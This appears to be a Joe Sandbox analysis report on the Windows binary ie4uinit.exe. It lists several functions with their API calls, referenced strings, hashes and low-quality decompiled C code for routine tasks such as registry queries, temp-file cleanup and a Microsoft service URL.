Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID:
String ID: about:newsfeed$about:tabs$msn.cn$msn.com
API String ID: 0-2860905812
Opcode ID: ee785f9d378af5630c1425e899b39de16617f4c831697d1f613dc4b8326d94dc
Instruction ID: 97f1df4cc37373e8456c6afbe22c1bf14ac45f06323429f2eb36ff8c709c774e
Opcode Fuzzy Hash: ee785f9d378af5630c1425e899b39de16617f4c831697d1f613dc4b8326d94dc
Instruction Fuzzy Hash: D8219E22E1C6C6A2FB04EF16D844339A760FF84B8CF809031DA5E47658DFADD445AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E03BC Relevance: 16.6, APIs: 11, Instructions: 94fileCOMMON

Download Yara Rule

APIs

#74.IERTUTIL ref: 00007FF7319E03D9

Part of subcall function 00007FF7319E0204: FindFirstFileExW.KERNEL32 ref: 00007FF7319E0279
Part of subcall function 00007FF7319E0204: GetLastError.KERNEL32 ref: 00007FF7319E0288
Part of subcall function 00007FF7319E0204: FindClose.KERNEL32 ref: 00007FF7319E0392

#81.IERTUTIL ref: 00007FF7319E0419
RemoveDirectoryW.KERNEL32 ref: 00007FF7319E0431
DeleteFileW.KERNEL32 ref: 00007FF7319E0439
CloseHandle.KERNEL32 ref: 00007FF7319E0448
GetLastError.KERNEL32 ref: 00007FF7319E0452
GetLastError.KERNEL32 ref: 00007FF7319E046C
#81.IERTUTIL ref: 00007FF7319E049B
CloseHandle.KERNEL32 ref: 00007FF7319E04B2
SetFileAttributesW.KERNEL32 ref: 00007FF7319E04C4
#78.IERTUTIL ref: 00007FF7319E04DB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseErrorFileLast$FindHandle$AttributesDeleteDirectoryFirstRemove
String ID:
API String ID: 679420900-0
Opcode ID: 0c6023473af65966e22ec26d8daafbac2e1d9139c3c5d07e50fb88086737b95a
Instruction ID: eb0246873a9f23f1aef009262acb31461ac004076a0ff5d10050aeeb4d64eac9
Opcode Fuzzy Hash: 0c6023473af65966e22ec26d8daafbac2e1d9139c3c5d07e50fb88086737b95a
Instruction Fuzzy Hash: D4416821F0D682E2E750AB65D684239A390EF44FA8F99C630D55E426D8FFACE8559330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D6FC8 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00007FF77FF7319D6FC8(void* __edx, long long* __rax, long long __rbx, signed int __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed int _a8, long long _a16, long long _a24, signed int _a40) {
				signed long long _v56;
				void* __rdi;
				void* __rbp;
				void* _t39;
				signed long long _t65;
				signed long long _t70;
				void* _t92;
				long long* _t94;
				void* _t97;
				void* _t103;
				void* _t104;
				signed long long* _t105;

				_a16 = __rbx;
				_a24 = __rsi;
				_a8 = __rcx;
				_t96 = _t97;
				_t105 = _a40;
				_t69 = __r9;
				 *_t105 =  *_t105 & 0x00000000;
				E00007FF77FF7319C1670();
				_t94 = __rax;
				if (__rax == 0) goto 0x319d7016;
				 *__rax = 0x319e54e8;
				goto 0x319d7018;
				_t39 =  ==  ? 0x8007000e : 0;
				if (__rax == 0) goto 0x319d7146;
				_a40 = _a40 & 0x00000000;
				_t65 =  &_a8;
				_a8 = _a8 & 0x00000000;
				r8d = r14d;
				_v56 = _t65;
				if (E00007FF77FF7319E2F3C(8, __rax, __rdx, __r8,  &_a40, _t103, _t104) < 0) goto 0x319d7132;
				_t107 = _a8;
				_t109 = _a40;
				if (__r9 == 0) goto 0x319d710a;
				__imp__#2();
				_a8 = _t65;
				if (_t65 == 0) goto 0x319d715f;
				if (E00007FF77FF7319C1440(_t24, _t24, __r9,  &_a8, L"&clientkey=", _t92, _t94, _t97) < 0) goto 0x319d7115;
				if (_a40 == 0) goto 0x319d70ae;
				if (E00007FF77FF7319D72E8(_t65, _t69,  &_a8, _a40, _t97) < 0) goto 0x319d7115;
				if (E00007FF77FF7319C1440(_t26, _t26, _t69,  &_a8, L"&mac=", _t92, _t94, _t97) < 0) goto 0x319d7115;
				if (_a8 == 0) goto 0x319d70db;
				if (E00007FF77FF7319D72E8(_t65, _t69,  &_a8, _a8, _t96) < 0) goto 0x319d7115;
				_t70 = _a8;
				if (_t70 != 0) goto 0x319d70e8;
				goto 0x319d70fc;
				__imp__#149();
				__imp__#150();
				 *_t105 = _t65;
				if (_t65 != 0) goto 0x319d7111;
				if (_t70 == 0) goto 0x319d7111;
				goto 0x319d7119;
				goto 0x319d7119;
				E00007FF77FF7319C1698(_t65, _t109);
				E00007FF77FF7319C1698(_t65, _t107);
				__imp__#6();
				 *0x319e7038();
				return 0;
			}

0x7ff7319d6fc8
0x7ff7319d6fcd
0x7ff7319d6fd2
0x7ff7319d6fdf
0x7ff7319d6fe6
0x7ff7319d6fef
0x7ff7319d6ff8
0x7ff7319d6ffd
0x7ff7319d7002
0x7ff7319d7008
0x7ff7319d7011
0x7ff7319d7014
0x7ff7319d7022
0x7ff7319d7025
0x7ff7319d702b
0x7ff7319d7030
0x7ff7319d7034
0x7ff7319d703d
0x7ff7319d7040
0x7ff7319d7054
0x7ff7319d705a
0x7ff7319d705e
0x7ff7319d7065
0x7ff7319d706e
0x7ff7319d7074
0x7ff7319d707b
0x7ff7319d7095
0x7ff7319d709a
0x7ff7319d70ac
0x7ff7319d70c2
0x7ff7319d70c7
0x7ff7319d70d9
0x7ff7319d70db
0x7ff7319d70e2
0x7ff7319d70e6
0x7ff7319d70eb
0x7ff7319d70f6
0x7ff7319d70fc
0x7ff7319d7103
0x7ff7319d7108
0x7ff7319d710f
0x7ff7319d7113
0x7ff7319d711c
0x7ff7319d7124
0x7ff7319d712c
0x7ff7319d7140
0x7ff7319d715e

APIs

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

SysAllocString.OLEAUT32 ref: 00007FF7319D706E
SysFreeString.OLEAUT32 ref: 00007FF7319D712C

Strings

https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF7319D6FDD
&clientkey=, xrefs: 00007FF7319D7081
&mac=, xrefs: 00007FF7319D70AE

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$AllocFreeHeapProcess
String ID: &clientkey=$&mac=$https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP
API String ID: 858782919-1362008807
Opcode ID: 5d009a413e85f270e67a567bcbc24dd4421520f91cffdb7136139671b867b777
Instruction ID: 4b844be2d9287d4fdec44591363dd865eb956647997de4ac0114a50e802ddbe9
Opcode Fuzzy Hash: 5d009a413e85f270e67a567bcbc24dd4421520f91cffdb7136139671b867b777
Instruction Fuzzy Hash: A1918323F18AD2A6EB04AB71DC046B9A3A5BB44B8CF944531EE4D57B9CDFBCD4019360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D8F64 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00007FF77FF7319D8F64(void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
				void* _t66;
				void* _t67;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t88;
				void* _t110;
				signed long long _t111;
				signed long long _t119;
				void* _t124;
				intOrPtr _t125;
				signed long long _t135;
				signed long long _t138;
				void* _t153;
				void* _t156;
				signed long long _t157;
				void* _t166;
				void* _t167;
				void* _t170;
				void* _t173;
				void* _t175;
				void* _t179;
				signed long long _t182;
				signed long long _t183;

				_t168 = __r11;
				_t88 = __eflags;
				_t110 = _t156;
				 *((long long*)(_t110 + 0x10)) = __rbx;
				 *((long long*)(_t110 + 0x18)) = __rsi;
				 *((long long*)(_t110 + 0x20)) = __rdi;
				_t154 = _t110 - 0x1ff8;
				E00007FF77FF7319E4200(0x20d0, _t110, _t167, __r11);
				_t157 = _t156 - _t110;
				_t111 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t110 - 0x1ff8 + 0x1fc0) = _t111 ^ _t157;
				_t113 = __rcx + 0x20;
				r13d = 0;
				 *((intOrPtr*)(__rcx + 0x20)) = r13d;
				_t124 = __rcx - 1;
				if (_t88 != 0) goto 0x319d8fb0;
				_t8 = _t124 + 2; // 0x19
				r9d = 0x824;
				_t125 =  *0x319e5740; // 0x7ff7319ea0b0
				if (E00007FF77FF7319C6830(_t8, _t113 + 0x50, _t110 - 0x1ff8 + 0xf70, _t166, _t168) < 0) goto 0x319d91cf;
				if (E00007FF77FF7319DA6F8(__rbx, _t125, _t110 - 0x1ff8 + 0xf70, __rcx, __rcx + 0x2c8) < 0) goto 0x319d91cf;
				 *((short*)(__rcx + 0x2c0)) = 8;
				r14d = r13d;
				r9d = 0x824;
				r12b =  *0x7FF7319F4474;
				_t66 = E00007FF77FF7319C6830(2, _t113 + 0x50, _t157 + 0x20, _t166, _t168);
				if (_t66 < 0) goto 0x319d907b;
				0x319e405e(_t179, _t175, _t173, _t170, _t153);
				if (_t66 == 0) goto 0x319d907b;
				_t182 =  *0x319f4470 +  *0x319f4470 * 4 << 4;
				_t67 = E00007FF77FF7319DA6F8(0x319f4470, _t157 + 0x20, _t157 + 0x20, __rcx, __rcx + 0x48 + _t182);
				if (_t67 < 0) goto 0x319d907b;
				 *((short*)(_t182 + __rcx + 0x40)) = 8;
				if (_t67 >= 0) goto 0x319d9084;
				if (r12b != 0) goto 0x319d9094;
				r14d = r14d + 1;
				if (r14d - 0x11 < 0) goto 0x319d9016;
				if (r13d < 0) goto 0x319d91cf;
				r15d = r13d;
				r9d = 0x824;
				_t69 = E00007FF77FF7319C6830(2, _t113 + 0x50, _t157 + 0x20, _t166, _t168);
				if (_t69 < 0) goto 0x319d90fd;
				0x319e405e();
				if (_t69 == 0) goto 0x319d90fd;
				_t119 =  *0x319f4580 +  *0x319f4580 * 4 +  *0x319f4580 +  *0x319f4580 * 4;
				 *((short*)(__rcx + 0x40 + _t119 * 8)) = 0x13;
				__imp___wtoi();
				 *((intOrPtr*)(__rcx + 0x48 + _t119 * 8)) = 0x13;
				if (r12d == 0xd) goto 0x319d910b;
				if (_t69 < 0) goto 0x319d91cf;
				r15d = r15d + 1;
				if (r15d - 2 < 0) goto 0x319d90a6;
				r14d = r13d;
				r12d = 0xb;
				_t36 = _t157 + 0x20; // 0x2b
				_t183 =  *0x319f45a0;
				r9d = 0x824;
				_t71 = E00007FF77FF7319C6830(2, _t113 + 0x50, _t36, _t166, _t168);
				if (_t71 < 0) goto 0x319d91ba;
				0x319e405e();
				if (_t71 == 0) goto 0x319d91ba;
				0x319e405e();
				if (_t71 != 0) goto 0x319d918b;
				_t135 = _t183 + _t183 * 4 + _t183 + _t183 * 4;
				_t72 = _t71 | 0xffffffff;
				 *((intOrPtr*)(__rcx + 0x40 + _t135 * 8)) = r12w;
				 *(__rcx + 0x48 + _t135 * 8) = _t72;
				goto 0x319d91ba;
				0x319e405e();
				if (_t72 != 0) goto 0x319d91b5;
				_t138 = _t183 + _t183 * 4 + _t183 + _t183 * 4;
				 *((intOrPtr*)(__rcx + 0x40 + _t138 * 8)) = r12w;
				 *((intOrPtr*)(__rcx + 0x48 + _t138 * 8)) = r13w;
				goto 0x319d91ba;
				if (0x80004005 < 0) goto 0x319d91cf;
				r14d = r14d + 1;
				if (r14d - 1 < 0) goto 0x319d9128;
				return E00007FF77FF7319E38D0(0x80004005, 0x18,  *(_t154 + 0x1fc0) ^ _t157);
			}

0x7ff7319d8f64
0x7ff7319d8f64
0x7ff7319d8f64
0x7ff7319d8f67
0x7ff7319d8f6b
0x7ff7319d8f6f
0x7ff7319d8f7c
0x7ff7319d8f88
0x7ff7319d8f8d
0x7ff7319d8f90
0x7ff7319d8f9a
0x7ff7319d8fa4
0x7ff7319d8fad
0x7ff7319d8fb0
0x7ff7319d8fb7
0x7ff7319d8fbb
0x7ff7319d8fbd
0x7ff7319d8fc0
0x7ff7319d8fc6
0x7ff7319d8fdd
0x7ff7319d8ffa
0x7ff7319d900c
0x7ff7319d9013
0x7ff7319d9022
0x7ff7319d9028
0x7ff7319d9031
0x7ff7319d903a
0x7ff7319d9048
0x7ff7319d904f
0x7ff7319d9055
0x7ff7319d9065
0x7ff7319d906e
0x7ff7319d9075
0x7ff7319d907d
0x7ff7319d9082
0x7ff7319d9084
0x7ff7319d9092
0x7ff7319d9096
0x7ff7319d909c
0x7ff7319d90b2
0x7ff7319d90bd
0x7ff7319d90c6
0x7ff7319d90d4
0x7ff7319d90db
0x7ff7319d90e6
0x7ff7319d90ee
0x7ff7319d90f3
0x7ff7319d90f9
0x7ff7319d9101
0x7ff7319d9105
0x7ff7319d910b
0x7ff7319d9116
0x7ff7319d9118
0x7ff7319d9122
0x7ff7319d912c
0x7ff7319d9131
0x7ff7319d9134
0x7ff7319d913f
0x7ff7319d9148
0x7ff7319d9156
0x7ff7319d915d
0x7ff7319d916b
0x7ff7319d9172
0x7ff7319d9178
0x7ff7319d917b
0x7ff7319d917e
0x7ff7319d9184
0x7ff7319d9189
0x7ff7319d9197
0x7ff7319d919e
0x7ff7319d91a4
0x7ff7319d91a7
0x7ff7319d91ad
0x7ff7319d91b3
0x7ff7319d91bc
0x7ff7319d91be
0x7ff7319d91c9
0x7ff7319d9200

APIs

StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF7319D33B1), ref: 00007FF7319D9048
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF7319D33B1), ref: 00007FF7319D90D4
_wtoi.MSVCRT ref: 00007FF7319D90F3
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF7319D33B1), ref: 00007FF7319D9156
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF7319D33B1), ref: 00007FF7319D916B
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF7319D33B1), ref: 00007FF7319D9197

Strings

false, xrefs: 00007FF7319D918B
Missing, xrefs: 00007FF7319D903C, 00007FF7319D90C8, 00007FF7319D914A
true, xrefs: 00007FF7319D915F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: _wtoi
String ID: Missing$false$true
API String ID: 259676474-471191888
Opcode ID: 3e6fb3627816cfa2127f89f5c01441e566d1aa3782fbb513c0e7cb0a988daaec
Instruction ID: db9fc3139d1a6c3858ed3f1b658ddc61d55a0de76fde300d1f458738928e52f6
Opcode Fuzzy Hash: 3e6fb3627816cfa2127f89f5c01441e566d1aa3782fbb513c0e7cb0a988daaec
Instruction Fuzzy Hash: B271B923E18AC2A2EB20FB24D4482AAA765FF4478CFC15035DA5D47398DF7DE605D360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C3964 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 166commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF7319C477E), ref: 00007FF7319C39BB
CoTaskMemAlloc.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF7319C477E), ref: 00007FF7319C3A63
memcpy_s.MSVCRT ref: 00007FF7319C3A82
PropVariantClear.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF7319C477E), ref: 00007FF7319C3AC0
PropVariantClear.OLE32(?,?,00000000,?,?,00000001,00000000,?,00007FF7319C477E), ref: 00007FF7319C3B1B

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

SHSetLocalizedName.SHELL32 ref: 00007FF7319C3BC2

Strings

%HOMEDRIVE%%HOMEPATH%, xrefs: 00007FF7319C3A0A
%windir%\System32\ie4uinit.exe, xrefs: 00007FF7319C3BB8
@"%%windir%%\System32\ie4uinit.exe",-%d, xrefs: 00007FF7319C39D8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ClearPropVariant$AllocCreateInstanceLocalizedNameTask_vsnwprintfmemcpy_s
String ID: %HOMEDRIVE%%HOMEPATH%$%windir%\System32\ie4uinit.exe$@"%%windir%%\System32\ie4uinit.exe",-%d
API String ID: 839107887-2483958424
Opcode ID: 138003da1fc4e3052338b94c18ac13caf96c53c073741587f145ae55acbf6bde
Instruction ID: 69692e25ed5f8f4169068afe958bf74c9ab21f2db8fc5ba5d76d39c1f7f4df52
Opcode Fuzzy Hash: 138003da1fc4e3052338b94c18ac13caf96c53c073741587f145ae55acbf6bde
Instruction Fuzzy Hash: 5C712226B18A86A1EB40EF16E880669B730FB88F98F805032DE4D43778DF7DE545D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DFBB8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF7319DFC0E
RegQueryInfoKeyW.ADVAPI32 ref: 00007FF7319DFC6E
GetProcessHeap.KERNEL32 ref: 00007FF7319DFC92
HeapAlloc.KERNEL32 ref: 00007FF7319DFCA0
RegEnumKeyExW.ADVAPI32 ref: 00007FF7319DFCF0
GetProcessHeap.KERNEL32 ref: 00007FF7319DFD74
HeapFree.KERNEL32 ref: 00007FF7319DFD82
RegCloseKey.ADVAPI32 ref: 00007FF7319DFD91

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection\Users, xrefs: 00007FF7319DFBF6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$Process$AllocCloseEnumFreeInfoOpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection\Users
API String ID: 2872490147-1621995387
Opcode ID: e6d5943c8a1f25b9c243a971c7bba53f5a1afdfbc68f72a13f9018f390b43a38
Instruction ID: e82915f5480edb6b63a1d82e7f159093bc519b8c77237301b86e3d7695dae3c5
Opcode Fuzzy Hash: e6d5943c8a1f25b9c243a971c7bba53f5a1afdfbc68f72a13f9018f390b43a38
Instruction Fuzzy Hash: 0351B532E047C296E710EFA5D8943A9A7A4FB44B98F504135DE5923B68DF7CD4429720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C7D68 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7319C7D7A

Strings

wil, xrefs: 00007FF7319C7D8F, 00007FF7319C7E91

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: 5c80fab51faedde322a659711dfeb9a51a672c836d672a0ef49eff2139b8e43e
Instruction ID: 1974aaff62b902804490b6223b5f180f23af67d09cfc35a24830d5676a06be8b
Opcode Fuzzy Hash: 5c80fab51faedde322a659711dfeb9a51a672c836d672a0ef49eff2139b8e43e
Instruction Fuzzy Hash: 6D3183A2E0C183A2F7646B21EC00779A3519F85798FE08031D5C9469ACDEBCE845EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C6B98 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6BDD
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6C02
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6C1A
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,00007FF7319C269D), ref: 00007FF7319C6C54
RegQueryValueExW.ADVAPI32 ref: 00007FF7319C6C88
RegCloseKey.ADVAPI32 ref: 00007FF7319C6CA6

Strings

IconsVisible, xrefs: 00007FF7319C6C6B
SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo, xrefs: 00007FF7319C6BCF, 00007FF7319C6C46
ShowIconsCommand, xrefs: 00007FF7319C6BEB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: IconsVisible$SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo$ShowIconsCommand
API String ID: 3677997916-1059487045
Opcode ID: 45de30f276edc796e8929d36aba0ead1cd1ee7ed658fe25d5a13e23702bb7c57
Instruction ID: 1007c1d150416fabb776d1ebc6352c9b115727f7b2b40e98e1db2185f28dd562
Opcode Fuzzy Hash: 45de30f276edc796e8929d36aba0ead1cd1ee7ed658fe25d5a13e23702bb7c57
Instruction Fuzzy Hash: 03313232E0C792EAE720AF24E840569B364FB4475DF805635D68D43BA8DFBCE154DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C2AC0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FF77FF7319C2AC0() {
				signed int _v24;
				char _v1048;
				void* _v1576;
				char _v2104;
				char _v2120;
				void* __rbx;
				long _t16;
				void* _t29;
				signed long long _t36;
				void* _t38;
				void* _t56;
				void* _t57;
				signed long long _t58;
				void* _t59;
				void* _t61;

				_t36 =  *0x319f4658; // 0x8be7dd1f02a
				_v24 = _t36 ^ _t58;
				E00007FF77FF7319C5974(0x319f4348, L"In CmdAdminScavengeSystem\n", _t59, _t61);
				if (GetTempPathW(??, ??) - 0x103 > 0) goto 0x319c2bc1;
				r8d = 0;
				if (GetTempFileNameW(??, ??, ??, ??) == 0) goto 0x319c2bc1;
				r8d = 0x200;
				_t16 = ExpandEnvironmentStringsW(??, ??, ??);
				if (_t16 == 0) goto 0x319c2b6c;
				r8d = _t16;
				E00007FF77FF7319C5BBC(0x104, _t29, _t36 ^ _t58, _t38,  &_v2104,  &_v1048, _t57,  &_v2104);
				goto 0x319c2b71;
				if (0x57 != 0) goto 0x319c2bb4;
				__imp___wfopen_s();
				if (0x57 != 0) goto 0x319c2b9c;
				E00007FF77FF7319C5E58(0x57, _t38,  &_v2120,  &_v2104, _t56, _t57,  &_v2104);
				goto 0x319c2b9e;
				r8d = 0;
				E00007FF77FF7319C5974(0x319f4348, L"Total Packages Removed from the system: %1!u!\n", "r",  &_v2104);
				E00007FF77FF7319C6040(DeleteFileW(??), _t38, L"Total Packages Removed from the system: %1!u!\n", _t56);
				return E00007FF77FF7319E38D0(0, 0x104, _v24 ^ _t58);
			}

0x7ff7319c2ac9
0x7ff7319c2ad3
0x7ff7319c2ae9
0x7ff7319c2b0b
0x7ff7319c2b16
0x7ff7319c2b30
0x7ff7319c2b36
0x7ff7319c2b4b
0x7ff7319c2b53
0x7ff7319c2b55
0x7ff7319c2b65
0x7ff7319c2b6a
0x7ff7319c2b73
0x7ff7319c2b86
0x7ff7319c2b8e
0x7ff7319c2b95
0x7ff7319c2b9a
0x7ff7319c2b9e
0x7ff7319c2baf
0x7ff7319c2bc1
0x7ff7319c2be0

APIs

Part of subcall function 00007FF7319C5974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD
Part of subcall function 00007FF7319C5974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
Part of subcall function 00007FF7319C5974: PostThreadMessageW.USER32 ref: 00007FF7319C5A39

GetTempPathW.KERNEL32 ref: 00007FF7319C2B00
GetTempFileNameW.KERNEL32 ref: 00007FF7319C2B28
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7319C2B4B
_wfopen_s.MSVCRT ref: 00007FF7319C2B86
DeleteFileW.KERNEL32 ref: 00007FF7319C2BB9

Part of subcall function 00007FF7319C5BBC: memset.MSVCRT ref: 00007FF7319C5C1C
Part of subcall function 00007FF7319C5BBC: CreateFileW.KERNEL32 ref: 00007FF7319C5C8C
Part of subcall function 00007FF7319C5BBC: GetCurrentProcess.KERNEL32 ref: 00007FF7319C5C9F
Part of subcall function 00007FF7319C5BBC: GetCurrentProcess.KERNEL32 ref: 00007FF7319C5CA8
Part of subcall function 00007FF7319C5BBC: DuplicateHandle.KERNEL32 ref: 00007FF7319C5CD1
Part of subcall function 00007FF7319C5BBC: GetStdHandle.KERNEL32 ref: 00007FF7319C5CE4
Part of subcall function 00007FF7319C5BBC: CreateProcessW.KERNEL32 ref: 00007FF7319C5D3C
Part of subcall function 00007FF7319C5BBC: WaitForSingleObject.KERNEL32 ref: 00007FF7319C5D4F
